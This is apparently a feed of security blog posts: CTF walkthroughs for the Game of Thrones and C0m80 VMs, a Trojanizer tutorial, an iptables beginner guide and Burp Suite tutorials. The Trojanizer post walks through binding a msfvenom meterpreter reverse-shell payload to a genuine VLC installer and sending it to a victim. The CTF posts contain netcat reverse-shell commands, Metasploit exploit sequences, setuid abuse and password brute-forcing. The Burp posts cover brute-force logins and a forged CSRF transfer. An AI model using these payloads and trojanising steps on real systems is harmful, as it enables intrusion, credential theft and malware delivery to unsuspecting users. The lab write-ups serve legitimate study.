News from 'Hacking Articles'

Syndicate content
Raj Chandel's Blog
Updated: 10 hours 19 min ago

Hack the Game of Thrones VM (CTF Challenge)

Thu, 15/Feb/2018 - 16:04

Hello friends! Today we are going to take another CTF challenge known as Game of Thrones. The credit for making this vm machine goes to “OscarAkaElvis” and it is another capture the flag challenge in which our goal is to get all the flags to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.133 but you will have to find your own)

netdiscover

Use nmap for port enumeration

nmap -p- -sV 192.168.1.133

We find that port 80 is running http, so we open the ip in our browser.

We take a look at the source code and find the flag syntax.

Use dirb to enumerate the ports.

dirb http://192.168.1.133

We find the robots.txt file, we open it and find few directories.

We open the directory /secret-island/ using user-agent Three-eyed-raven

We open it and find a link to a map.

When we open the map we find the location of all the flags.

We open the directory called /direct-access-to-kings-landing/ using user-agent Three-eyed-raven.

We open the directory and take a look at the source code and find what looks like port for port knocking and to user as oberynmartell.

We then find /h/i/d/d/e/n/ directory using dirb and we open it.

We take a look at the source code and find password for oberynmartell.

We use ftp to connect we use the username and password we previously found to login. We get the first flag as soon we login.

We find two files and download through ftp and find a file that gives us the type of hash it uses.

We save the hash in a file.

Now we use john the ripper to decrypt the file and find the password to be stark

John –format=dynamic_2008 hash.txt

Now we use mcrypt to decrypt the encrypted file we found in the ftp server.

mcrypt -d the_wall.txt.nc

We now add the domain winterfell.7kingdoms.ctf to /etc/hosts and open the link found in the file.

We login using the username and password to login, and find a page with two images.

We take a look at the source code, and we find the second flag.

Along with the second flag we also find a hint that it contains something, so we download the file and use strings to take a look inside the file and find a domain name.

strings stark_shield.jpg

It hints us that TXT record will contain something useful so we use nslookup to check the TXT records.  We had to make some changes to the domain name to make it valid, and we find our 3rd flag.

nslookup -q=txt Timef0rconqu3rs.7Kingdoms.ctf 192.168.1.133

Now we add the new domain name to /etc/hosts and open the link found in TXT record above.

We use login the username and password we find in the TXT records.

We use the search provided by the site to check for vulnerabilities.

We use the file manager module and it opened a file manager that lets us access few files.

In /home/aryastark folder we find a file called flag.txt

We download the file and open it in our system and find our 4th flag.

Now we got a hint to access a database now we know the server is running postgresql, we connect to it using the username password available in the file we find earlier.

psql –h 192.168.1.133 –u robinarryn –d mountainandthevale

We find a table called flag, we open it and find a base64 encoded string.

We decode the base64 encode string and find our 5th flag.

Now we check the other tables to check if we miss anything. In one of the tables we find a few names

Select * from arya_kill_list

In arya_kill_list we find these names that seems useful.

Searching through the database we find a rot16 encoded string.

We now convert the rot16 encoded flag and find a name of database along with the password. It also gives us a hint to use the username we find in the table above.

After enumerating the username we find that TheRedWomanMelisandre is the username.

Now we check the the table and find a secret flag.

Now we know kingdom of reach is in imap as it was shown in the map, now we use the number we find earlier to port knock.

knock 192.168.1.133 3487 64535 12345

Now we do a nmap scan to check if any new port opened on the server, we find that port 143 that is running imap opened.

nmap -p- 192.168.1.133

We use netcat to connect to it, we use the username and password we find in the hint earlier.

nc 192.168.1.133 143

In the inbox we find our 6th flag, we also get a hint to use port 1337 and a username and password is given to login.

We login into the site and find that it is git site.

After enumerating through the files we find that this site is vulnerable to command injection and a hint to use mysql.

We use netcat to get reverse shell on the site we use “”`code` to execute our code.

nc –e /bin/bash 192.168.1.116 1234

Now we setup our listener using netcat as soon as we execute our command we get a reverse shell.

nc -lvp 1234

On the webpage earlier we find hex encoded string when we decode it we get a location of a file:/home/tyrionlannister/checkpoint.txt, so we open it and find username, password and name of the database we need to look for.

Now we use the information above to find the tables available in the database.

We find the name of the table, it is called iron_throne, we take a look inside the table.

Now we find a morse code when we decode it we find it converts to /etc/mysql/flag, when we try to access it gives that file not found, earlier we find a hint that states we don’t have enough privileges so we try to take a look at our privileges.

We find that we can import files into the database. So first we create a table named Flag.

Now we import the file into our table.

Now when we access it we find our 7th flag. We also get username and password for ssh login.

Now we use this to login through ssh.

ssh daenerystargaryen@192.168.1.133

Enumerating through the system we find two files called digger.txt and checkpoint.txt, checkpoint.txt contains a hint to login through ssh at ip 172.25.0.2 and use the file digger.txt to login through ssh.

We download digger.txt to our system through ssh.

scp digger.txt root@192.168.1.116:

We use local tunnelling to bind it to our port 2222.

ssh daenerystargaryen@192.168.1.133 –L 2222:172.25.0.2:22 –N

Now we use hydra to login through ssh to using username as root and use digger.txt file to brute force.

We find that for the username root we have password “Dr4g0nGl4ss!”

We use this to login through ssh, we use localhost to connect as we have done ssh local tunnel to connect to trough ssh.

Now we enumerating through the files we find our secret flag. We also get a username and password to login through ssh.

We use metasploit to connect through ssh using this username and password.

msf > use auxiliary/scanner/ssh/ssh_login

msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.1.133

msf auxiliary(scanner/ssh/ssh_login) > set username branstark

msf auxiliary(scanner/ssh/ssh_login) > set  password Th3_Thr33_Ey3d_Raven

msf auxiliary(scanner/ssh/ssh_login) > run

After searching for some obvious possibilities to escalate privileges such as executables with the setuid bit set or exploits for the kernel, we noticed that this server is docker based. So we use the docker privilege escalation in metasploit.

msf > use exploit/linux/local/docker_daemon_privilege_escalation

msf exploit(linux/local/docker_daemon_privilege_escalation) >  set lhost 192.168.1.116

msf exploit(linux/local/docker_daemon_privilege_escalation) >  set payload linux/x86/meterpreter/reverse_tcp

msf exploit(linux/local/docker_daemon_privilege_escalation) >  set session 1

msf exploit(linux/local/docker_daemon_privilege_escalation) >  run

Now we get our escalated session, we now check and find that we are root.

Now we enumerate through the files and find password protected zip file called final_battle and a file that tells us how to find the password. It contains a pseudo code that tells us how to create the password using secret flags we found.

Now we have obtained 2 secret flag, searching through the files we find that music file contain a secret flag. In the home page we find 2 music file we use exiftool and find that the mp3 file contains the secret flag.

exiftool  game_of_thrones.mp3

Now we create a code using the pseudocode as reference in python.

We run the program and find the password.

We use zip to extract the file and use this password.

7z e final_battle

We find that a file called flag.txt was extracted, we open the file and find our final flag.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Hack the Game of Thrones VM (CTF Challenge) appeared first on Hacking Articles.

Categories: Cyber India

Bind Payload using SFX archive with Trojanizer

Wed, 14/Feb/2018 - 16:07

The Trojanizer tool uses WinRAR (SFX) to compress the two files input by user, and transforms it into an SFX executable (.exe) archive. The SFX archive when executed it will run both files (our payload and the legit application at the same time).

How to get Trojanizer?

You can clone using this Github link:

Command: git clone https://github.com/r00t-3xp10it/trojanizer.git

Now Before Running the Trojanizer we will create a payload using msfvenom

Command: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.111 lport=4466 -f exe > /root/Desktop/backdoor.exe

Running Trojanizer

Open the terminal in the Directory where you have cloned the git file. Here you will find a Trojanizer.sh File run it using

Command: ./Trojanizer.sh

Trojanizer has some prerequisites which it will try to install on the initial run. If it could install you could install manually the below mentioned prerequisites.

Wine Program Files, WinRAR Software and Zenity.

After Loading the Tool, it will ask you if you want to execute the Framework

Clicking Yes Will Open a Window Titled Payload to Be Compressed, here we will select the payload that we created using msfvenom in the beginning of the practical.

After selecting the payload another window will open titled Legit Application to Trojanize

Here we will have to select any legit or original software file (.exe) to bind with our payload. I am binding VLC Player Installer File with my payload.

After clicking OK we will be asked for a New Name for the combined file. Keep it like any installer File. For Example: vlc-32bit-Installer or vlc-update64 or anything of your choice.

Now we will have to select any icon for our combined file. You can choose from the list given by default or you can download any icon file (.ico) from Google.

I have downloaded the VLC Icon. As you can see in the above image I am adding the vlc-icon.ico file as an icon.

Note: Trojanizer works with WINRAR and because of that many a times this icon doesn’t bind with the combined file, instead it shows a WinRAR icon. It is a bug we soon hope will be fixed.

After selecting the icon file. You will be granted with this window informing you about the path of the newly payload combined software.

Now Let’s Start a Listener on the port we mentioned as a lhost earlier. Start with opening Metasploit Framework by typing

msf > use exploit/multi/handler

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 192.168.1.111

msf exploit(multi/handler) > set lport 4466

msf exploit(multi/handler) > run

Now send the malicious software to the victim by any means you desire.

When the user will open the file, he will be greeted with the normal security warning as it is normally shown.

After clicking Run the user will have the VLC installer running and he won’t suspect anything.

But as he clicks Run we will also have his meterpreter session as shown below.

That’s how we can bind our payload file with any original software file (.exe) using Trojanizer.

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

The post Bind Payload using SFX archive with Trojanizer appeared first on Hacking Articles.

Categories: Cyber India

Beginner Guide to IPtables

Fri, 09/Feb/2018 - 22:18

Hello friends!! In this article we are going to discuss on Iptables and its uses. Iptables is a command-line firewall, installed by default on all official Ubuntu distributions. Using Iptables, you can label a set of rules, that will be go after by the Linux kernel to verify all incoming and outgoing network traffic.

Today we will look at some basic concept of Ipatble using various Iptables options to generate a Filter Table which will filter the incoming and outgoing traffic

Basic Iptables Options

-A :  Add this rule to a rule chain.

-L:  List the current filter rules.

-m conntrack : Allow filter rules to match based on connection state. Permits the use of the –ctstate option.

–ctstate: Define the list of states for the rule to match on. Valid states are:

  • NEW – The connection has not yet been seen.
  • RELATED – The connection is new, but is related to another connection already permitted.
  • ESTABLISHED – The connection is already established.
  • INVALID – The traffic couldn’t be identified for some reason.

-m limit: Require the rule to match only a limited number of times. Allows the use of the –limit option.

Useful for limiting logging rules:

  • –limit – The maximum matching rate, given as a number followed by “/second”, “/minute”, “/hour”, or “/day” depending on how often you want the rule to match. If this option is not used and -m limit is used, the default is “3/hour”.

-p: Describe the connection protocol used.

–dport :  The destination port(s) required for this rule. A single port may be given, or a range may be given as start: end, which will match all ports from start to end, inclusive.

-j :  Jump to the specified target. By default, iptables allows four targets:

  • ACCEPT – Accept the packet and stop processing rules in this chain.
  • REJECT– Reject the packet and notify the sender that we did so, and stop processing rules in this chain.
  • DROP– Silently ignore the packet, and stop processing rules in this chain.
  • LOG– Log 

-I: Inserts a rule. Takes two options, the chain to insert the rule into, and the rule number it should be.

-I:  INPUT 5 would insert the rule into the INPUT chain and make it the 5th rule in the list.

-s: –source – address [/mask] source specification

-d: –destination – address[/mask] destination specification

Iptables follow Ipchain rules which is nothing but the bunch of firewall rules to control incoming and outgoing traffic

Three Important Types Iptable chains

Input Chain:  Input chain rule rule is used to manage the activities of incoming traffic towards server.

Output Chain: Ouput chain rule is used to manage the activities of outgoing traffic from your server.

Forward Chain: A forward chain rule is used for adding up rules related to forwarding of an ip packet. This is usually used while you have a Linux machine as router linking two networks collectively.

As discribed above by default install iptable is availabe in all Ubuntu distribution but if it is not installed in any Linux based system and you want to install it then excute given below command.

sudo apt-get install iptables

By default iptable is blank which allows all incoming and outgoing connection traffic without filtering them. In order to verify inbuilt rules of iptable we need to execute following command which displays the list of rules if added in iptables.

sudo iptables -L -v

here -L is used for display the chain rules of iptables and  -v for complete information.

Allow Incoming Traffic

In order to allow traffic for any particular port you can use given below command here we have accept incoming on port 22 for SSH, 80 for HTTP and 443for HTTPS respectively

sudo iptables -A INPUT -p tcp –dport 22 -j ACCEPT

sudo iptables -A INPUT -p tcp –dport 80 -j ACCEPT

sudo iptables -A INPUT -p tcp –dport 443 -j ACCEPT

So it will allow tcp connection when traffic will coming on port 22, 80 and 443.

Drop/Deny Incoming Traffic

In order to deny traffic for any particular port you can use given below command here we have drop incoming on port 21 for FTP and 23 for Telnet respectively

sudo iptables -A INPUT -p tcp –dport 21 -j DROP

sudo iptables -A INPUT -p tcp –dport 23 -j DROP

So it will deny tcp connection when traffic will coming on port 21, 23 and give a message Time Out.

Reject Incoming Traffic

Reject and Drop action closely work same in order to obstruct the incoming traffic from establishing connection with server only the difference is that, here it will send message with “ICMP message Port Unreachable” and drop the incoming packet. You can use given below command here we have reject incoming on port 25 for SMTP.

sudo iptables -A INPUT -p tcp –dport 25 –j REJECT

So it will drop tcp connection when traffic will coming on port 25 and give a message Destination Port unreachable.

Allow Incoming Traffic from Specific IP

In order to allow traffic form only a particular IP to establish a secure connection between server and client you can execute given below command

sudo iptables -A INPUT -s 192.168.1.104 -j ACCEPT

It will accept packet coming from network 192.168.1.104

Block Specific Network IP

In order to deny traffic form only a particular IP to establish a secure your server from attacker’s IP you can execute given below command

sudo iptables -A INPUT -s 192.168.1.102 -j DROP

It will deny packet coming from network 192.168.1.102

Block Specific Network Interface

To block a specific network interface, for example eth0, execute given below command which drop the incoming traffic coming from 10.10.10.10

sudo iptables -A INPUT -i eth0 -s 10.10.10.10-j DROP

Here you can change the action to allow traffic from a particular network interface using –j ACCEPT options.

 

Block Specific IP Range

To block a specific IP range in order to deny, the incoming traffic coming from specific range of IP. Execute given below command which drop incoming packet coming from IP 192.168.1.100 till IP 192.168.1.200

sudo iptables -A INPUT -m iprange –src-range 192.168.1.100-192.168.1.200 -j DROP

Here you can change the action to allow traffic from a particular IP range using –j ACCEPT options.

Block Specific Mac Address

To block a specific Mac address in order to deny, the incoming traffic coming from specific machine. Execute given below command which drop incoming packet coming from given Mac address or attacker machine.

sudo iptables -A INPUT -m mac –mac-source FC:AA:14:6A:9A:A2 -j DROP

Here you can change the action to allow traffic from a particular Mac address using –j ACCEPT options.

Block Ping Request

Network administrator always concern with network security therefore they always Block Ping request either by using Drop or Reject action , here we are blocking Ping request using DROP option as given in below command.

sudo iptables -A INPUT -p icmp -i eth0 -j DROP

View List of Applied Chain rules

In order to view our applied chain rules once again we are going to execute given below command which will dump list of Iptable rules.

sudo iptables -L

From given below image you can observe 4 columns which contains records of IPtable rules.

Here these columns define following information:

Target: Defines applied action

Prot: stand for Protocol type that can TCP, ICMP or UDP

Option: further option to define rule, here it is blank

Source: Incoming traffic network IP Address

Destination: Host IP address which will receive incoming traffic packet.

Now if someone tries to Ping the server machine as shown in given below image, so here you can read the message “Request timed out” which means the server machine has drop our ICMP request packet.

Deleting Any Rule

In order to delete any rule of your Iptable to remove it from inside your filter table you can use option -D with input rule number.  We are going to remove our last rule ICMP drop connection which was at number 12 in the given list of rule.

sudo iptables -D INPUT 12

Here you can replace number 12 from any other number which rule you wish to remove according to your list of rules.

Let’s view our remaining chain rules once again using -L option as done above. From given below image you can observe that now the list contain only 11 rules and eliminated  rule ICMP drop the connection.

Flush IPtables

If you want to remove entire set of rule in order to flush your Iptable then use option -F to flush your ipatble applied rules and execute given below command.

sudo iptables -F

Now once again when we had viewed the list of rule, this time we got empty table as shown in given below image.

Source: https://help.ubuntu.com/community/IptablesHowTo

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Beginner Guide to IPtables appeared first on Hacking Articles.

Categories: Cyber India

Payload Processing Rule in Burp suite (Part 2)

Tue, 06/Feb/2018 - 18:15

Hello friends!! Today we are going to discuss “Payload Encoding” option followed by payload processing of Burpsuite which is advance functionality comes under Intruder Tab for making brute force attack.

Payload Encode

The processing rule can be used to encode the payload using various schemes such as URL, HTML, Base64, ASCII hex or constructed strings.

Let’s start!!

First, we have intercepted the request of the login page of the router by giving its default IP which is 192.168.1.1, where we have given an invalid username and password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Thus the sent request will be captured by burp suite which you can see in the given below image. In the screenshot I had highlight some value in the last line. Here it tells the type of authentication provided by router is basic and if you have read above theory of basic authentication I had described that it is encoded in base 64

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted password and follow the given below step for selecting payload position.

  • Press on the Clear button given at right of window frame.
  • Now select the encoded value of authentication for payload position and click to ADD button on the left side of frame.
  • Choose the Attack type as

Now click on payloads option after selecting payload position. Then select the Payload type as Simple list, where we have added a dictionary by clicking on Load button. We can either load the dictionary or we can manually add input strings using the Add button in the payload options as shown in the image.

The base64 encoded value of Authentication is combination of username and password now the scenario is to generate same encoded value of authentication with help of user password dictionary, therefore I have made a dictionary.

Before executing the attack we have added a payload processing rule to the payload type which is Encode and we have selected “Base64 encode” scheme because we know router takes the value in Base64.

Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax because this will start brute force attack and try to match string for user authentication. In screenshot you can the status and length of the highlighted value is different from rest of values. This means we can use this encoded value to bypass the user authentication which occur from request number 10. Now check the username and password of 10th line in dictionary. 

And to confirm the username and password matched, we will give the password in the Router’s Login Page, which will successfully log us into the Router’s Configuration Page. This shows our success in the attack as shown in the image.

Decode

This processing rule can be used to decode the payload using various schemes: URL, HTML, Base64 or ASCII hex. As we know decoding is nothing but reversing the encoding. It can be used in an opposite way in which encoding is carried out.

Hash

This processing rule can be used to carry out a hashing operation on the payload. There are 7 types of hashing algorithms are available in this payload processing rule which is as follows:

  • SHA-384
  • SHA-224
  • SHA-256
  • MD5
  • MD2
  • SHA
  • SHA-512

First, we have intercepted the request of the Redirection Link designed to find redirection vulnerabilities in the LAB created by us and in the hash value of the URL we have given a wrong hash value of HTTP://www.google.com in place of the actual hash value of the HTTP://www.hackingarticles.in in the URL of the redirecting page. We have simply clicked on the Redirection link as shown in the image; the burp suite will capture the request of the redirecting page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted password and follow the given below step for selecting payload position.

  • Press on the Clear button given at right of window frame.
  • Now we will select the fields where we want to attack which is the hash value of the redirecting page and then click on Add button.
  • Choose the Attack type as sniper.

Then select the Payload type as Simple list, where we have added a dictionary by clicking on Load button. We can either load the dictionary or we can manually add input strings using the Add button in the payload options as shown in the image.

Before executing the attack we have added a payload processing rule to the payload type which is Hash and then we have selected MD5 which is a commonly used algorithm for converting URL of the websites into a Hash MD5 value. As you can see the input strings of the dictionary are in a simple text form, but this processing rule converts it into Hash MD5 values which can be seen in result window of the attack.

Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax because now the burp suite will do its work, match the Hash MD5 of the Redirecting Page which will give you the correct MD5 value. The moment it will find the correct value, it will change the value of length as shown in the image.

The Hash MD5 value, we will give the Hash value in the URL of the redirecting page which is HTTP://www.hackingarticles.in, which will successfully redirect us to HTTP://www.hackingarticles.in. This shows our success in the attack as shown in the image.

Add Raw Payload

This processing rule can be used to add raw payload value before or after the current processed value. For example it can come in handy whenever we want to submit the same payload in both raw and hashed form.

First, we have intercepted the request of the login page in the Bwapp LAB, where we have given default username and wrong password. Then click on login , the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by right clicking on the space and selecting Send to Intruder option or simply press ctrl + i. Now open the Intruder tab then select Positions tab and the following will be visible. Choose the Attack type as Sniper. Press on the Clear button as shown in the image. Now we will select the fields where we want to attack which is the password and click on Add button.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted password and follow the given below step for selecting payload position.

  • Press on the Clear button given at right of window frame.
  • Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.
  • Choose the Attack type as
  • In the given below image we have selected password that means we will need one dictionary files for password.

Before executing the attack we have added a payload processing rule to the payload type which is Add Raw Payload and then we have selected Append Pre-processed Payload. This adds a raw payload value before and after the current processed value. As you can see the input strings of the dictionary as single input string is repeated twice which can be seen in result window of the attack.

Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax because now the burp suite will do its work, match the password which will give you the correct password. The moment it will find the correct value, it will change the value of length as shown in the image.

And to confirm the password matched, we will give the password in the Bwapp LAB login page, which will successfully log us into the Bwapp lab. This shows our success in the attack as shown in the image.

Skip if Matches Regex

This processing rule can be used to check the current processed value matches a specified regular expression, and if it matches it will skip the payload and will move onto the next one. For example, Suppose we have a parameter value that have a minimum length and want to skip values in the list that are shorter than minimum length defined.

First, we have intercepted the request of the login page in the Bwapp LAB, where we have given default username and wrong password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted password and follow the given below step for selecting payload position.

  • Press on the Clear button given at right of window frame.
  • Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.
  • Choose the Attack type as
  • In the given below image we have selected password that means we will need one dictionary files for password.

Then select the Payload type as Simple list, where we have added a dictionary by clicking on Load button. We can either load the dictionary or we can manually add input strings using the Add button in the payload options as shown in the image.

Before executing the attack we have added a payload processing rule to the payload type which is Skip if Matches Regex where we have given an input of {@} in the match regex field. Here we see that as per this rule if the input given matches with any of the input strings in the dictionary it simply skip that value and move on to next.

Now Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax because now the burp suite will do its work, match the password which will give you the correct password. The moment it will find the correct value, it will change the value of length as shown in the image.

Author: Ashray Gupta is a Researcher and Technical Writer at Hacking ArticlesHe is a certified ethical hacker, web penetration tester and a researcher in nanotechnology. Contact Here

The post Payload Processing Rule in Burp suite (Part 2) appeared first on Hacking Articles.

Categories: Cyber India

Engagement Tools Tutorial in Burp suite

Tue, 06/Feb/2018 - 13:49

Hello friends!! Today we are going to discuss Importance of Engagement tools which is a Pro-only feature of Burp Suite. It is mainly use in information gathering and hence the analysis of any web application testing.

Its four important utilities are following:

  • Find References
  • Discover Content
  • Schedule Task
  • Generate CSRF POC
Find References

This function can be used to search all Burp suite tools for HTTP responses that link to a particular item. To make use of this function, select an HTTP request anywhere in Burp suite, or any part of the site map, and choose “Find references” in “Engagement tools” in the context menu which can be seen clicking Action Tab within Burp suite.

The result window of the search shows responses (from all Burp tools) that are link to the selected item. Whenever we view an individual search result, the response will be automatically highlighted to show where the linking reference is occurring.

This function treats the original URL as a Prefix whenever we search for links, so if you select a host, you will find all references related to the host and if you select a folder, you will find all references to items inside that folder.

First, we have intercepted the request of the Vulnweb.com which is a demo lab available over the internet which can be used for testing attacks. Then click on enter after writing the URL of the Vulnerable Web in your browser , then the burp suite will capture the request of the web page in the intercept tab.

Then click on Action Tab, after that select the Engagement tools then click on Find References. This will open a result window which will show all the references related to the URL whose request has been captured which is the Vulnerable Web as shown in the image.

Discover Content

This function is used to discover contents and functionality which are not linked with visible content that you can browse or spider.

There are various techniques that burp suite uses to discover content, which includes name guessing, web spidering, and extrapolation from naming conventions observed within the use of application.

Control

This tab shows you the current status of the session. The toggle button represents whether the session is running or not, and it also allows you pause and restart the session.

The following information is displayed about the progress of the discovery session:

  • Number of requests made
  • Number of bytes transferred in server responses
  • Number of network errors
  • Number of discovery tasks queued
  • Number of spider requests queued
  • Number of responses queued for analysis

Target

This option allows you to define or state the start directory of the content discovery session, and whether the files or directories should be targeted. The options that are available are as follows:

  • Start directory – This is the location where Burp suite is used to look for content. The items within this path and subdirectories are requested during the session.
  • Discover – This option can be used to determine whether the session will look for files or directories or both.
Site Map

The discovery session uses their own site map, showing all of the content which has been discovered within the defined scope. If you have configured your Burp suite to do so, newly discovered items can be added to Burp suite’s main site map.

First, we have intercepted the request of the Vulnweb.com which is a demo lab available over the internet which can be used for testing attacks. Then click on enter after writing the URL of the Vulnerable Web in your browser , then the burp suite will capture the request of the web page in the intercept tab.

Then click on Action Tab within the Burp suite, after that select the Engagement tools then click on Content Discovery. This will open a result window which will show the discovery session status and queued tasks which are related to the URL whose request has been captured which is the Vulnerable Web as shown in the image.

Schedule Task

This function can be used to automatically start and stop certain tasks at defined times and intervals. We can use the task scheduler to start and stop certain automated tasks while you are not working, and to save your work periodically or at a specific time.

To make use of this function, select an HTTP request anywhere in Burp suite, or any part of the target site map, and choose “Schedule task” within “Engagement tools” in the context menu which can be seen by clicking right within Burp suite.

The types of task that are available within this function are as follows:

  • Scan from a URL
  • Pause active scanning
  • Resume active scanning
  • Spider from a URL
  • Pause spidering
  • Resume spidering
  • Save state

First, we have intercepted the request of the vulnweb.com which is a demo lab available over the internet which can be used for testing attacks. Then click on enter after writing the URL of the Vulnerable Web in your browser , then the burp suite will capture the request of the web page in the intercept tab.

Then click on Action Tab within the Burp suite, after that select the Engagement tools then click on Schedule Task. This will open a window of schedule task options where we have selected Scan from a URL option as shown in the image.

Then Click Next a window will open where we have to give the URL we want to scan its branches from the site map.

Then Click Next we see that the scanner tab of the burp suite is open which scans all the branches beneath the site map of the given URL which is seen in the scan queue tab as shown in the image which are related to the URL whose request has been captured which is the Vulnerable Web as shown in the image.

Generate CSRF PoC

This function can be used to generate a proof-of-concept (PoC) cross-site request forgery (CSRF) attack for any given request.

To access this function, select a URL or HTTP request anywhere in the Burp suite, and choose “Generate CSRF PoC” within “Engagement tools” in the context menu which can be seen by clicking right within Burp suite.

Let’s start!!

First, we have intercepted the request of the CSRF (transfer amount) option in the Bwapp LAB, where we have given an Account Number.

Then click on transfer, the burp suite will capture the request of the page in the intercept tab.

Then click  on Action Tab within the Burp suite, after that select the Engagement tools then click on Generate CSRF PoC. This will open a window of the CSRF PoC where we made a change in Account value and Amount value in CSRF HTML code as shown in the image.

After making changes in the values click on Test in Browser option or Copy HTML this will open the window of Show response in browser then click on COPY, and then paste it in the Browser and Press Enter as shown in the image.

We see a Submit request Button is seen in the browser after that click on it.

It appears to us that the amount is reduced as we have transferred the amount from the account by making changes in the CSRF HTML code as shown in the image.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Engagement Tools Tutorial in Burp suite appeared first on Hacking Articles.

Categories: Cyber India

Hack the C0m80 VM (Boot2root Challenge)

Mon, 05/Feb/2018 - 13:20

Hello friends! Today we are going to take another CTF challenge known as C0m80. The credit for making this vm machine goes to “3mrgnc3” and it is another boot2root challenge in which our goal is to get root to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.127 but you will have to find your own)

netdiscover

Use nmap for port enumeration

nmap -A -p- 192.168.1.127

We find that port 80, 111, 139, 445, 2049, 20021, 37196. 40325, 41605, 49418, 58563 are open. As port 80 is running http we open the ip address in our browser.

We don’t find anything on the web page so we use dirb to enumerate the directories.

dirb http://192.168.1.127

We find a link to a login page that is running mantis bug report. We find that the version is vulnerable; we can reset the password of the users with this vulnerability. You can read how to exploit this vulnerability here.

Now we exploit this vulnerability to change the password of the users.

We can change password of all the users present just by changing the id. After changing all the password we find that alice(id=4) is the only account with administrative privileges.

Going the mails we find a page that contains a link to a backup file.

We download the backup file using wget to get more information about the file.

After downloading the backup file we find that it is a hexdump, we use this program here, to convert it to bin format.

Then we use binwalk to check for for embedded file and binaries and find that there are 2 binaries.

binwalk ftp.bin

We use dd to convert the files into exe and dll, so that we can run the program.

Now we run the program and find it’s a program for ftp server.

We use netstat to check of ports, and found that port 20021 opened for listening on our system.

netstat -antp

We use netcat to connect to the system and find that indeed it is an application for ftpserver.

nc localhost 20021

 

We now reverse engineer the exe file using ollydbg for more information. And find that when it reads http: it opens the link in the the browser.

We use browser autopwn auxiliary to search for vulnerabilities.

msf > use auxiliary/server/browser_autopwn2

msf auxiliary(server/browser_autopwn2)> set lhost 192.168.1.130

msf auxiliary(server/browser_autopwn2)> run

We find that the server can be exploited using firefox_proto_crmrequest, so we setup our listener on metasploit.

msf > use exploit/multi/browser/firefox_proto_crmfrequest

msf exploit(multi/browser/firefox_proto_crmfrequest) > set lhost 192.168.1.130

msf exploit(multi/browser/firefox_proto_crmfrequest) > set lport 4444

msf exploit(multi/browser/firefox_proto_crmfrequest) > set target 1

msf exploit(multi/browser/firefox_proto_crmfrequest) > set payload windows/meterpreter/reverse_tcp

msf exploit(multi/browser/firefox_proto_crmfrequest) > run

Now we copy the link given by metasploit and use it in the ftp server running on the target machine.

As soon as we run the command we get our reverse shell.

Going through the files we get a hint of file that contains all the passwords.

So we use the search command to find all the files with that name on the server.

search -f *PWMangr2*

We download the file on our server.

Now we open the file and find all the passwords.

Now as the author of the machine states that we can directly access the machine, we go to the server and use the password we find for rdp.

Now we have access to the machine we find a ssh private key but our nmap scan showed no ssh service running on the server so we take a look at the ssh configuration files and find that the ssh only accepts local connections on port 65122.

Now we use the private key we find to login as al1ce, as it is the other account used on this server.

When we try to login through ssh using the key. We use plink to connect, we get a prompt to unlock the key we use the password we find al1ce (7M6Kt8tC8X5Qz99@Eeb8592Z$Fd@u286) and unlock the private key.

plink –l al1ce localhost –I id_rsa –P 65122

Now we are login as al1ce.

Now the server is running nfs, so we can use this to upload setuid root binaries.

Now we create a shell using metasploit.

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.130 lport=4444 -f elf > shell

Now we setup our listener using metasploit.

msf > use exploit/multi/handler

msf exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 192.168.1.130

msf exploit(multi/handler) > set lport 4444

msf exploit(multi/handler) > set run

Now we use a script called nsfpysh to interact with nsf, we upload our shell and give him executable permission along with setuid.

Now we go to the target machine and run the shell.

As soon as we run the shell, we get the reverse shell as root.

Now we find that we are the root user.

Now we go to the root folder and find the congratulatory flag.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Hack the C0m80 VM (Boot2root Challenge) appeared first on Hacking Articles.

Categories: Cyber India

Payload Processing Rule in Burp suite (Part 1)

Sat, 03/Feb/2018 - 15:02

Hello friends!! Today we are going to discuss “Payload Processing” option of Burpsuite which is advance functionality comes under Intruder Tab for making brute force attack.

Payload Processing

Payload Processing can be defined as when payloads are generated using payload types, they can be further manipulated or filtered using various processing rules and payload encoding.

Payload Processing Rules

These rules are defined to perform various processing task on each payload before it is used. These rules are executed in a sequence, and they can be used to help debug any problem with the configuration. Payload processing rules are useful in situations where you need to generate different payloads, or where we want to wrap payloads within a wider structure or encoding scheme.

There are 12 types of payload processing rules available:

  • Add prefix
  • Add suffix
  • Match / Replace
  • Substring
  • Reverse substring
  • Modify case
  • Encode  
  • Decode
  • Hash
  • Add raw payload
  • Skip if matches regex
  • Invoke Burp extension

Let’s start!!

Add Prefix

This processing rule adds up a prefix before the payload.

First, we have intercepted the request of the login page in the Bwapp LAB, where we have given default username and wrong password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

